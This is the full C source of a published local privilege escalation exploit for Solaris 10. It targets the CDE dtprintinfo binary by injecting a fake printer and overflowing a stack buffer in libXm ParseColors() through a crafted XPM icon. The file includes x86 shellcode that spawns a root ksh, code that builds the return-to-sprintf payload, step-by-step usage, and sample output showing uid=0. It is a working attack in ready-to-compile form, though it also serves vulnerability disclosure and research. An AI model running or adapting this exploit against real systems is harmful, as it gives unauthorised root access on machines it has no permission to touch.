Solaris 10 dtprintinfo Local Privilege Escalation

/* * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> * * "What has been will be again, *  what has been done will be done again; *  there is nothing new under the Sun." *                     -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas 10.0.0.109:0 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> *  * Using SI_PLATFORM       : i86pc (5.10) * Using stack base        : 0x8047fff * Using safe address      : 0x8045790 * Using rwx_mem address   : 0xfeffa004 * Using sc address        : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary   : /usr/dt/bin/dtprintinfo *  * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. * The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) *                                 ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */#include <fcntl.h>#include <link.h>#include <procfs.h>#include <stdio.h>#include <stdlib.h>#include <strings.h>#include <unistd.h>#include <sys/stat.h>#include <sys/systeminfo.h>#define INFO1  "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"#define INFO2  "Copyright (c) 2023 Marco Ivaldi <[email protected]>"#define  VULN  "/usr/dt/bin/dtprintinfo"  // vulnerable program#define  DEBUG  "/tmp/XXXXXXXXXXXXXXXXXX"  // target for debugging#define  BUFSIZE  1106        // size of hostile buffer#define PADDING  1        // hostile buffer padding#define SAFE  0x08045770      // 1st arg to ParseColors()char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) *//* triple setuid() */"\x31\xc0\x50\x50\xb0\x17\xcd\x91""\x31\xc0\x50\x50\xb0\x17\xcd\x91""\x31\xc0\x50\x50\xb0\x17\xcd\x91"/* execve() */"\x31\xc0\x50\x68/ksh\x68/bin""\x89\xe3\x50\x53\x89\xe2\x50""\x52\x53\xb0\x3b\x50\xcd\x91";/* globals */char  *arg[2] = {"foo", NULL};char  *env[256];int  env_pos = 0, env_len = 0;/* prototypes */int  add_env(char *string);void  check_bad(int addr, char *name);int  get_env_addr(char *path, char **argv);int  search_ldso(char *sym);int  search_rwx_mem(void);void  set_val(char *buf, int pos, int val);/* * main() */int main(int argc, char **argv){  char  buf[BUFSIZE], cmd[1024], *vuln = VULN;  char  platform[256], release[256], display[256];  int  i, sc_addr, safe_addr = SAFE;  FILE  *fp;  int  sb = ((int)argv[0] | 0xfff);  // stack base  int  ret = search_ldso("sprintf");  // sprintf() in ld.so.1  int  rwx_mem = search_rwx_mem();  // rwx memory  /* helper that prints argv[0] address, used by get_env_addr() */  if (!strcmp(argv[0], arg[0])) {    printf("0x%p\n", argv[0]);    exit(0);  }  /* print exploit information */  fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);  /* process command line */  if ((argc < 2) || (argc > 3)) {    fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n",        argv[0]);    exit(1);  }  snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);  if (argc > 2) {    safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);  }  /* enter debug mode */  if (safe_addr == 0x41414141) {    unlink(DEBUG);    snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);    if (system(cmd) == -1) {      perror("error creating debug binary");      exit(1);    }    vuln = DEBUG;  }  /* fill envp while keeping padding */  add_env("LPDEST=fnord");    // injected printer  add_env("HOME=/tmp");      // home directory  add_env("PATH=/usr/bin:/bin");    // path  sc_addr = add_env(display);    // x11 display  add_env(sc);        // shellcode  add_env(NULL);  /* calculate shellcode address */  sc_addr += get_env_addr(vuln, argv);  /* inject a fake printer */  unlink("/tmp/.printers");  unlink("/tmp/.printers.new");  if (!(fp = fopen("/tmp/.printers", "w"))) {    perror("error injecting a fake printer");    exit(1);  }  fprintf(fp, "fnord :\n");  fclose(fp);  link("/tmp/.printers", "/tmp/.printers.new");  /* craft the hostile buffer */  bzero(buf, sizeof(buf));  for (i = PADDING; i < BUFSIZE - 16; i += 4) {    set_val(buf, i, ret);    // sprintf()    set_val(buf, i += 4, rwx_mem);  // saved eip    set_val(buf, i += 4, rwx_mem);  // 1st arg    set_val(buf, i += 4, sc_addr);  // 2nd arg  }  memcpy(buf, "\"c c ", 5);    // beginning of hostile buffer  buf[912] = ' ';        // string separator  set_val(buf, 1037, safe_addr);    // safe address  set_val(buf, 1065, safe_addr);    // safe address  set_val(buf, 1073, 0xffffffff);    // -1  /* create the hostile XPM icon files */  system("rm -fr /tmp/.dt");  mkdir("/tmp/.dt", 0755);  mkdir("/tmp/.dt/icons", 0755);  if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {    perror("error creating XPM icon files");    exit(1);  }  fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf);  fclose(fp);  link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");  link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");  /* print some output */  sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);  sysinfo(SI_RELEASE, release, sizeof(release) - 1);  fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);  fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);  fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);  fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);  fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);  fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);  fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);  /* check for badchars */  check_bad(safe_addr, "safe address");  check_bad(rwx_mem, "rwx_mem address");  check_bad(sc_addr, "sc address");  check_bad(ret, "sprintf() address");  /* run the vulnerable program */  execve(vuln, arg, env);  perror("execve");  exit(0);}/* * add_env(): add a variable to envp and pad if needed */int add_env(char *string){  int  i;  /* null termination */  if (!string) {    env[env_pos] = NULL;    return env_len;  }  /* add the variable to envp */  env[env_pos] = string;  env_len += strlen(string) + 1;  env_pos++;  /* pad envp using zeroes */  if ((strlen(string) + 1) % 4)    for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {      env[env_pos] = string + strlen(string);      env_len++;    }  return env_len;}/* * check_bad(): check an address for the presence of badchars */void check_bad(int addr, char *name){  int  i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP  for (i = 0; i < sizeof(bad) / sizeof(int); i++) {    if (((addr & 0xff) == bad[i]) ||               ((addr & 0xff00) == bad[i]) ||        ((addr & 0xff0000) == bad[i]) ||         ((addr & 0xff000000) == bad[i])) {      fprintf(stderr, "error: %s contains a badchar\n", name);      exit(1);    }  }}/* * get_env_addr(): get environment address using a helper program */int get_env_addr(char *path, char **argv){  char  prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  char  hex[11];  int  fd[2], addr;  /* truncate program name at correct length and create a hard link */  prog[strlen(path)] = '\0';  unlink(prog);  link(argv[0], prog);        /* open pipe to read program output */  if (pipe(fd) == -1) {    perror("pipe");    exit(1);  }  switch(fork()) {  case -1: /* cannot fork */    perror("fork");    exit(1);  case 0: /* child */    dup2(fd[1], 1);    close(fd[0]);    close(fd[1]);    execve(prog, arg, env);    perror("execve");    exit(1);  default: /* parent */    close(fd[1]);    read(fd[0], hex, sizeof(hex));    break;  }  /* check address */  if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {    fprintf(stderr, "error: cannot read address from helper\n");    exit(1);  }  return addr + strlen(arg[0]) + 1;}/* * search_ldso(): search for a symbol inside ld.so.1 */int search_ldso(char *sym){  int    addr;  void    *handle;  Link_map  *lm;  /* open the executable object file */  if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {    perror("dlopen");    exit(1);  }  /* get dynamic load information */  if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {    perror("dlinfo");    exit(1);  }  /* search for the address of the symbol */  if ((addr = (int)dlsym(handle, sym)) == NULL) {    fprintf(stderr, "sorry, function %s() not found\n", sym);    exit(1);  }  /* close the executable object file */  dlclose(handle);  return addr;}/* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */int search_rwx_mem(void){  int  fd;  char  tmp[16];  prmap_t  map;  int  addr = 0, addr_old;  /* open the proc filesystem */  sprintf(tmp,"/proc/%d/map", (int)getpid());  if ((fd = open(tmp, O_RDONLY)) < 0) {    fprintf(stderr, "can't open %s\n", tmp);    exit(1);  }  /* search for the last RWX memory segment before stack (last - 1) */  while (read(fd, &map, sizeof(map)))    if (map.pr_vaddr)      if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {        addr_old = addr;        addr = map.pr_vaddr;      }  close(fd);  /* add 4 to the exact address NUL bytes */  if (!(addr_old & 0xff))    addr_old |= 0x04;  if (!(addr_old & 0xff00))    addr_old |= 0x0400;  return addr_old;}/* * set_val(): copy a dword inside a buffer (little endian) */void set_val(char *buf, int pos, int val){  buf[pos] =  (val & 0x000000ff);  buf[pos + 1] =  (val & 0x0000ff00) >> 8;  buf[pos + 2] =  (val & 0x00ff0000) >> 16;  buf[pos + 3] =  (val & 0xff000000) >> 24;}